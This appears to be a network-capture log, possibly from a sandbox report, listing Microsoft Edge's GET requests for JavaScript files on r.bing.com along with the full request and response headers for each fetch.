Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: I3BasKzrfxsTHnCpr2Oniw==
Last-Modified: Tue, 24 Sep 2024 06:07:39 GMT
ETag: 0x8DCDC5F3193CF2A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 79e9baa4-c01e-006a-41c0-15b63b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=267131
Expires: Tue, 08 Oct 2024 18:17:42 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f098634
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/6ZpK9fh9cD0LYcXzkYpUR9MV_-g.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/6ZpK9fh9cD0LYcXzkYpUR9MV_-g.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Last-Modified: Fri, 06 May 2022 22:12:38 GMT
ETag: 0x8DA2FAD8818BE4E
Akamai-GRN: 0.521a1202.1727838073.9627ba18
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 152
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: OYWm8oudh4jPf5ceaY2T4A==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 867b60e4-201e-0014-778d-0d4cc3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=121794
Expires: Mon, 07 Oct 2024 01:55:25 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f098720
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 395
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: bJNwzHWywBuWP28bX2mBGQ==
Last-Modified: Mon, 25 Mar 2024 20:51:22 GMT
ETag: 0x8DC4D0D5492CDFE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d81d6b8b-c01e-007e-30bd-0394eb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=93154
Expires: Sun, 06 Oct 2024 17:58:05 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f098899
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Last-Modified: Wed, 17 Aug 2022 05:37:09 GMT
ETag: 0x8DA8012871F1AB6
Akamai-GRN: 0.4c1a1202.1725823437.26a3861a
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Type: text/javascript; charset=utf-8
Content-MD5: wQmZQwuzNQKGWvk013IgpA==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fc8beee0-201e-0082-6a80-ef4512000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 738
Cache-Control: public, no-transform, max-age=101448
Expires: Sun, 06 Oct 2024 20:16:19 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f0989ad
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/_2I169N92jVtSc_VEsV0nma5sRY.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/_2I169N92jVtSc_VEsV0nma5sRY.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 312
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: Ij6CMW7d9STrT+a4Nf7dFA==
Last-Modified: Wed, 22 May 2024 10:59:38 GMT
ETag: 0x8DC7A4E463C1AA1
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c36c48a9-a01e-0025-3790-f7add0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=83252
Expires: Sun, 06 Oct 2024 15:13:04 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098a63
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Content-MD5: yaTET5I1fmUKhVemn0wu5w==
Last-Modified: Wed, 14 Feb 2024 19:38:07 GMT
ETag: 0x8DC2D947800DADE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 48823962-c01e-0060-145a-8639b5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 786
Cache-Control: public, no-transform, max-age=54744
Expires: Sun, 06 Oct 2024 07:17:56 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098b79
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 462
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: fr82fvtvcsicFIwsSPlj7g==
Last-Modified: Tue, 24 Sep 2024 06:17:19 GMT
ETag: 0x8DCDC608BA54CA4
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7833081e-501e-006f-0ec0-154244000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.8a777b5c.1727982020.f57097b
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Cache-Control: public, no-transform, max-age=267221
Expires: Tue, 08 Oct 2024 18:19:13 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098c56
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/fRSNKQanUHk53F1a1Bi8UA71Qt4.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/fRSNKQanUHk53F1a1Bi8UA71Qt4.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 174
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: +jWBJey2nJqR+pG7G7E28A==
Last-Modified: Tue, 24 Sep 2024 06:46:13 GMT
ETag: 0x8DCDC6494C9BF9A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7b921056-e01e-0032-0f67-15b240000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=228906
Expires: Tue, 08 Oct 2024 07:40:38 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098d81
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rs/6s/lO/nj/EmG-XMIMCcq8zmcVBBO7jkFERAE.js?or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rs/6s/lO/nj/EmG-XMIMCcq8zmcVBBO7jkFERAE.js?or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 406
Content-Type: application/x-javascript; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Fri, 04 Oct 2024 01:33:34 GMT
X-EventID: 66ffc1a03b604902adc20a42cb43f9bb
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E0B1
X-AS-SuppressSetCookie: 1
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-L/mZiFVSj9FOaSudNovhvjLjdVNlDC9avDY+EhDUju0='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=325012
Expires: Wed, 09 Oct 2024 10:22:24 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098e6c
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/4YcUwB3cLExJ1hflyCLNk8MH_3o.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/4YcUwB3cLExJ1hflyCLNk8MH_3o.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 12032
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: MKx6UXuV7DEFJdTnuICXwA==
Last-Modified: Thu, 26 Sep 2024 11:31:40 GMT
ETag: 0x8DCDE1ECA23BE24
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 43cd96b4-c01e-000c-32c3-150461000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=268536
Expires: Tue, 08 Oct 2024 18:41:08 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098f5c
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/4xONqw98GiV7FRuGhk0jeK0l40I.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/4xONqw98GiV7FRuGhk0jeK0l40I.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1233
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: OONv6VWVRsHx1kUaAXyX9g==
Last-Modified: Mon, 01 May 2023 19:02:50 GMT
ETag: 0x8DB4A76A8BC4E69
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: acfc8c93-701e-006b-6e38-148358000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=98781
Expires: Sun, 06 Oct 2024 19:31:54 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099180
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/492EisGuZn95Ylm-pbhazWgz4O8.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/492EisGuZn95Ylm-pbhazWgz4O8.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 716
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: +qxENtpiuBhtUBS8XkBr2w==
Last-Modified: Mon, 01 May 2023 19:02:53 GMT
ETag: 0x8DB4A76AA8A7388
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ceaa7e1b-101e-0042-2f2f-09bd2c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=57555
Expires: Sun, 06 Oct 2024 08:04:48 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f0995fa
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/dLXNK3o3tyXzkXA3Jj8ciHATOYc.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/dLXNK3o3tyXzkXA3Jj8ciHATOYc.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 264
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: JcCxsBEgq3pSE+SxVIOLFA==
Last-Modified: Tue, 24 Sep 2024 06:42:41 GMT
ETag: 0x8DCDC64168E1063
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 55e7d068-f01e-0062-7fb9-16ad48000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=374139
Expires: Thu, 10 Oct 2024 00:01:12 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099712
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 507
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: Tm502hkAmxWuxzxBM7uX9A==
Last-Modified: Fri, 15 Mar 2024 03:00:13 GMT
ETag: 0x8DC449C08B165CD
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f8ccb990-801e-000d-3502-14cc78000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=75635
Expires: Sun, 06 Oct 2024 13:06:25 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f09985d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/hAEVe25_jil71qxV8HNHEcjwOsk.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/hAEVe25_jil71qxV8HNHEcjwOsk.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 200
Content-Type: application/x-javascript; charset=utf-8
Content-Encoding: br
Content-MD5: Zbe+hPSEBfAPOTFWcPh+cQ==
Last-Modified: Wed, 17 Aug 2022 06:29:51 GMT
ETag: 0x8DA8019E419B51B
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 02c22dbf-201e-0049-27ff-134647000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=74211
Expires: Sun, 06 Oct 2024 12:42:41 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a270d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8w26ODmd1hk4C30WJtfkdBYFSfE.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/8w26ODmd1hk4C30WJtfkdBYFSfE.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
